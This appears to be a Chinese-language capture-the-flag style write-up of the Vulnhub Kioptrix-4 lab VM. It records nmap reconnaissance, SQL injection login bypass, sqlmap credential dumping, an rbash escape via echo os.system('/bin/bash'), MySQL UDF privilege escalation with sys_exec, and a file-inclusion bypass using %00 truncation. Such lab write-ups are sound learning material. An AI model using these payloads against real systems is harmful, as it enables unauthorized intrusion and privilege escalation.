Kioptrix-4

靶机下载地址

https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

环境搭建

由于这个靶机下载下来之后是一个vmdx的文件,所以要经过处理,直接创建一个新的虚拟机:

Kioptrix-4_第1张图片

选择其他;后面的一律“下一步”即可!

Kioptrix-4_第2张图片

最后将硬盘移除!

Kioptrix-4_第3张图片

使用现有的硬盘,加载下载下来的硬盘即可!内存也需要重新分配一下,之后打开即可:最终配置如下:

Kioptrix-4_第4张图片

信息收集

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:43:7c:b1, IPv4: 192.168.1.60
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     00:50:56:c0:00:08       VMware, Inc.
192.168.1.2     00:50:56:fe:b1:6f       VMware, Inc.
192.168.1.76    00:0c:29:85:3d:2d       VMware, Inc.
192.168.1.254   00:50:56:f0:ab:00       VMware, Inc.

探测存活主机信息,发现目标的靶机地址为192.168.1.76

# nmap -sT --min-rate 10000 -p- 192.168.1.76                   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 14:09 CST
Nmap scan report for 192.168.1.76
Host is up (0.0034s latency).
Not shown: 39528 closed tcp ports (conn-refused), 26003 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:85:3D:2D (VMware)

开放的端口信息为22 ssh 80端口是http 同时开启了139 445端口

# nmap -sT -sC -sV -O -p80,22,139,445 192.168.1.76 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 14:10 CST
Nmap scan report for 192.168.1.76
Host is up (0.00027s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  �º`�U      Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:85:3D:2D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2023-12-26T09:10:41-05:00
|_clock-skew: mean: 10h30m01s, deviation: 3h32m08s, median: 8h00m00s

服务的详细信息探测结果:

  1. OpenSSH 4.7p1 运行在vm上的主机 ubuntu系统
  2. 80端口 Apache httpd 2.2.8 PHP/5.2.4
  3. 139 445 samba
# nmap -sT --script=vuln -p80,22,139,445 192.168.1.76 -oN vuln.nmap  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 14:10 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.76
Host is up (0.00027s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.76
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.76:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.1.76:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.1.76:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:85:3D:2D (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 344.98 seconds

存在TRACE方法!然后就是存在一个数据库的文件~ 没有其他的暴露出来的信息了,看来突破点可能是在80端口上,先尝试在80端口上寻找突破,没什么思路的话,再看samba~

渗透测试

尝试访问80端口上运行的服务:

Kioptrix-4_第5张图片

有一个登陆注册的页面,这里可以尝试sql注入等相关的信息,同时,如果经过抓包,是明文或者密码是可以解密的话,那么我们就可以进行爆破!先看看源码中是否有相关提示:

Kioptrix-4_第6张图片

没什么提示,当我们输入账号和密码的时候,会提交给checklogin.php进行处理! 其他的没什么信息~先等等进行sql注入等测试,由于上面在信息收集的时候,发现了数据库文件,尝试访问下载下来观察下,并在进行一下目录的扫描:

Kioptrix-4_第7张图片

这个database.sql文件中发现了 数据库中存在表“members” 同时还有一个用户是john 密码是1234 那么我们就不需要去爆破了,直接尝试拿着这个用户去登陆即可!

Kioptrix-4_第8张图片

这里还去做了下目录的扫描。没什么新的发现,接下来就是去登录了。

Kioptrix-4_第9张图片

尝试了database.sql里面的用户名john和密码1234,发现登陆失败了~ 那就看看有没有sql注入吧:

Kioptrix-4_第10张图片

发现mypassword字段可能存在sql注入!尝试使用万能密码进行登录!

Kioptrix-4_第11张图片

这里就直接抓包,然后修改mypassword字段的值为1'+or+'1'='1 用户名就是john~

登陆成功了~

登陆进来什么都没有,由于url变成了username=john,所以尝试修改username=admin等其他用户,观察是否存在水平或者垂直越权漏洞;发现并没有:

Kioptrix-4_第12张图片

Kioptrix-4_第13张图片

既然存在sql注入,这里我就尝试直接上sqlmap去跑:

Kioptrix-4_第14张图片

sqlmap跑出来另一个用户和密码信息,这个密码信息看起来很像是base64;

这个密码就是这样的,其实不是base64;

尝试进行登录:

Kioptrix-4_第15张图片

登陆成功上来还是这个用户控制面板信息,什么功能都没有,这怎么办? ssh碰撞?先把两个账号和密码信息记录在这里:

john	MyNameIsJohn
robert ADGAdsafdfwt4gadfga==

进行碰撞ssh:

Kioptrix-4_第16张图片

第一个用户,就直接登陆成功了~

Kioptrix-4_第17张图片

当前的bash,应该是rbash,受限制的bash环境~ 咱们先退出,尝试另一个,如果还是rbash那就需要去绕过rbash:

Kioptrix-4_第18张图片

还是看不到什么东西~ 这里我不清楚是不是rbash;以前的时候看到过一个靶场类似于这种情况,先看看能不能绕过!

Kioptrix-4_第19张图片

尝试执行了几个命令,发现这就是rbash;ls echo cd 都是可以利用的 但是 / 不能利用;开始进行Linux环境信息的枚举;

ls
cd 
echo
>
>>
<
|

Kioptrix-4_第20张图片

执行sudo,会断开连接~

Kioptrix-4_第21张图片

不能用的东西有点点多啊~ 突然看到了我们刚使用ssh登陆进来的时候,可以使用? 或者help来查看使用的相关命令:

Kioptrix-4_第22张图片

发现了8个命令:

cd clear echo exit help ll lpath ls

那估计就是使用这上面的命令来绕过rbash!

由于我们是通过ssh进行登陆的,登陆进来便是rbash环境了,所以这里尝试ssh绕过rbash,但是失败了:

Kioptrix-4_第23张图片

尝试了很多种方式,都没有绕过,最终的绕过语句为:

echo os.system('/bin/bash')

#刚开始尝试了 echo `ls`     echo $(ls)  都无法执行

提权

进入网站的目录,发现网站的目录下面,存在两个用户的目录,进入到了john目录下面,发现了mysql的数据库账号和密码等相关信息:

Kioptrix-4_第24张图片

尝试进入mysql,在这之前看了一下/etc/passwd:

Kioptrix-4_第25张图片

发现我们刚才的shell被称作是kshell;

Kioptrix-4_第26张图片

在数据库中发现“secure_file_priv”的值为空!可能存在UDF提权~

Kioptrix-4_第27张图片

通常情况下是mysqld_safe是以root执行的,但是mysqld是以mysql用户执行的,但是这里可以看到二者都是以root权限执行的,所以可以尝试进行UDF提权!

Kioptrix-4_第28张图片

存在func表;这块已经存在UDF库,不需要再进行导入了,直接进行利用:

Kioptrix-4_第29张图片

利用sys_exec将当前用户追加到admin组中:

select sys_exec('usermod -a -G admin john');

Kioptrix-4_第30张图片

退出之后,查看当前用户所具有的权限:

Kioptrix-4_第31张图片

Kioptrix-4_第32张图片

至此提权成功~ root下面还有一个最终的flag文件!

总结

整个靶机在练习的过程中,出现了两个问题:

  1. 关于rbash的绕过,掌握的有所欠缺,并未成功的绕过rbash;
  2. 关于UDF提权同样也是理解不到位,需进一步加深对UDF提权的理解;

靶机还存在文件包含漏洞,这是在看了wp之后,才发现的,具体漏洞位置出现在member.php:

Kioptrix-4_第33张图片

变量page通过GET方式传递的username来得到;利用preg_replace()函数将变量page中的/etc/替换为空,但是只是替换了一次,所以这里可以尝试双写绕过;同时后面还通过“.”来拼接了.php

由于php版本为5.2.4,当php版本小于5.3的时候,便可利用%00来截断,从而绕过了后面拼接的php,最终file_exists()函数判断变量page存在,便会包含这个文件;

Kioptrix-4_第34张图片

你可能感兴趣的:(Vulnhub,网络安全,数据库,安全,学习,web安全)